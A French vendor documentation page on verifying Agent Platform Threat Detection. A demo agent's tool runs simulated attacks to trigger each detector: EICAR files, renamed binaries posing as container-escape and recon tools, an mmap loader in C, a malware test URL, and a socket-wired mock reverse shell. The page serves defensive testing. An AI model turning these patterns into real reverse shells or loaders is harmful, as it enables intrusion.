Cette page explique comment vérifier que Agent Platform Threat Detection fonctionne en déclenchant intentionnellement des détecteurs et en vérifiant les résultats. Agent Platform Threat Detection est un service intégré de Security Command Center.
Avant de commencer
Pour détecter les menaces potentielles pour vos agents Agent Runtime, assurez-vous que le service Agent Platform Threat Detection est activé dans Security Command Center.
Configurer l'environnement
Pour tester Agent Platform Threat Detection, configurez un agent de démonstration qui simule une activité malveillante.
Créer un projet et activer le shell
Sélectionnez ou créez un Google Cloud projet à utiliser pour les tests.
Pour tester les détecteurs, vous pouvez utiliser la Google Cloud console et Cloud Shell.
Accédez à la Google Cloud console.
Sélectionnez le projet que vous utiliserez pour le test.
Cliquez sur Activer Cloud Shell.
Vous pouvez également exécuter les instructions de test à partir d'un shell local.
Configurer Agent Runtime
Si vous n'avez jamais utilisé Agent Runtime dans ce projet, configurez l'environnement Agent Runtime avant de commencer. Notez le nom du bucket de préproduction Cloud Storage que vous avez créé. Nous vous recommandons également de suivre le guide de démarrage rapide d'Agent Runtime pour découvrir comment développer et déployer un agent avec le SDK Vertex AI.
Créer un script de test
Vous allez créer plusieurs fichiers qui seront utilisés pour déployer un nouvel agent à des fins de test. Pour ce faire, utilisez un éditeur de texte tel que nano.
Créez un fichier nommé
requirements.txtavec le contenu suivant.google-cloud-aiplatform[agent_engines] google-adk google-genai aiohttp cloudpickle pydanticCréez un fichier vide nommé
installation_scripts/install.sh. Certains tests nécessitent d'ajouter du contenu à ce fichier.Créez un fichier nommé
main.pyavec le contenu suivant. Remplacez les variablesPROJECT_ID,LOCATIONetSTAGING_BUCKET. Le nom du bucket de préproduction doit inclure le préfixegs://.import asyncio import os import subprocess import socket import vertexai from vertexai import Client, agent_engines from google.adk.agents import llm_agent from google.adk.sessions.in_memory_session_service import InMemorySessionService # Replace with your own project, location, and staging bucket. LOCATION = "LOCATION" PROJECT_ID = "PROJECT_ID" # Staging bucket must have gs:// prefix STAGING_BUCKET = "STAGING_BUCKET" client = Client(project=PROJECT_ID, location=LOCATION) def _run_command(args, **kwargs): output = f"Called {' '.join(args)}\n" try: res = subprocess.run(args, capture_output=True, text=True, **kwargs) if res.stdout: output += f"Result: {res.stdout.strip()}\n" if res.stderr: output += f"Error: {res.stderr.strip()}\n" except subprocess.TimeoutExpired: output += "Command timed out as expected." return output # Tool to simulate threats. The function body will be replaced for individual # detector tests. def threat_detection_test(): output = _run_command(["sleep", "60"]) output += _run_command(["echo", "this is a fake threat"]) output += _run_command(["sleep", "10"]) return output root_agent = llm_agent.Agent( model="gemini-2.5-flash", name="threat_detection_test_agent", description="Runs threat detection test.", instruction=""" You are an agent that runs a threat detection test using a fake malicious command. """, tools=[threat_detection_test], ) async def main(): vertexai.init( project=PROJECT_ID, location=LOCATION, staging_bucket=STAGING_BUCKET, ) app = agent_engines.AdkApp( agent=root_agent, session_service_builder=InMemorySessionService ) remote_agent = client.agent_engines.create( agent=app, config={ "display_name": "scc_threat_test_agent", "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY, "requirements": [ "google-cloud-aiplatform[agent_engines,adk]", "cloudpickle", "pydantic", ], "staging_bucket": STAGING_BUCKET, "extra_packages": [ "installation_scripts/install.sh", ], }, ) print("Deployed agent: ", remote_agent.api_resource.name) try: async for event in remote_agent.async_stream_query( user_id="threat_detection_tester", message="Run the threat detection test", ): print(event) finally: client.agent_engines.delete(name=remote_agent.api_resource.name, force=True) if __name__ == "__main__": asyncio.run(main())
Configurer l'environnement virtuel
Créez et activez un environnement virtuel Python.
python3 -m venv env source env/bin/activateInstallez les dépendances nécessaires dans l'environnement virtuel.
pip install -r requirements.txt
Tester le script
Exécutez le script à partir de l'environnement virtuel avec python3 main.py.
Cette commande prendra plusieurs minutes pour créer, déployer et exécuter l'agent de test.
Le script génère le nom de ressource de l'agent déployé, ainsi que quelques objets JSON, y compris une réponse LLM et d'autres métadonnées. Si vous rencontrez des erreurs d'autorisation ou de déploiement à ce stade, consultez la section Dépannage pour connaître les prochaines étapes.
Tester les détecteurs
Pour tester les détecteurs Agent Platform Threat Detection, remplacez le code de la fonction threat_detection_test par un code qui simule une attaque. Le script peut prendre beaucoup de temps pour déployer l'agent et l'interroger. Pour accélérer les tests, vous pouvez combiner le contenu de plusieurs de ces fonctions.
Exécution : binaire malveillant ajouté exécuté
Remplacez la fonction threat_detection_test dans le script de test, puis exécutez le script de test.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output += _run_command(["touch", "/tmp/test_mal_file"])
with open("/tmp/test_mal_file", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
output += _run_command(["sleep", "10"])
return output
Exécution : bibliothèque malveillante ajoutée chargée
Remplacez la fonction threat_detection_test dans le script de test, puis exécutez le script de test. Vous pouvez recevoir une erreur du SDK Vertex AI concernant l'analyse de la réponse, mais le résultat est toujours généré.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
with open("/tmp/test_mal_lib", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
output += _run_command(["sleep", "10"])
return output
Exécution : échappement de conteneur
Remplacez la fonction threat_detection_test dans le script de test, puis exécutez le script de test.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
output += _run_command(["sleep", "10"])
return output
Exécution : exécution d'un outil d'attaque de Kubernetes
Remplacez la fonction threat_detection_test dans le script de test, puis exécutez le script de test.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
output += _run_command(["/tmp/amicontained"])
output += _run_command(["sleep", "10"])
return output
Exécution : exécution d'un outil de reconnaissance local
Remplacez la fonction threat_detection_test dans le script de test, puis exécutez le script de test.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
output += _run_command(["/tmp/linenum.sh"])
output += _run_command(["sleep", "10"])
return output
Exécution : binaire malveillant modifié exécuté
Replace the `threat_detection_test` function in the test script, and then run the
test script.
```python
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```
Exécution : bibliothèque malveillante modifiée chargée
Remplacez la fonction threat_detection_test dans le script de test, puis exécutez le script de test.
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
output += _run_command(["sleep", "10"])
return output
URL malveillante observée
Mettez à jour le fichier installation_scripts/install.sh avec le contenu suivant.
#!/bin/bash
apt-get install -y curl --no-install-recommends
Remplacez la fonction threat_detection_test dans le script de test, puis exécutez le script de test.
def threat_detection_test():
url = "https://testsafebrowsing.appspot.com/s/malware.html"
output = _run_command(["sleep", "60"])
output += _run_command(["curl", url])
output += _run_command(["sleep", "10"])
return output
Interface système inversée
Remplacez la fonction threat_detection_test dans le script de test, puis exécutez le script de test.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("8.8.8.8", 53))
subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
output += _run_command(["sleep", "10"])
return output
Étape suivante
- En savoir plus sur Agent Platform Threat Detection.
- Découvrez comment utiliser Agent Platform Threat Detection.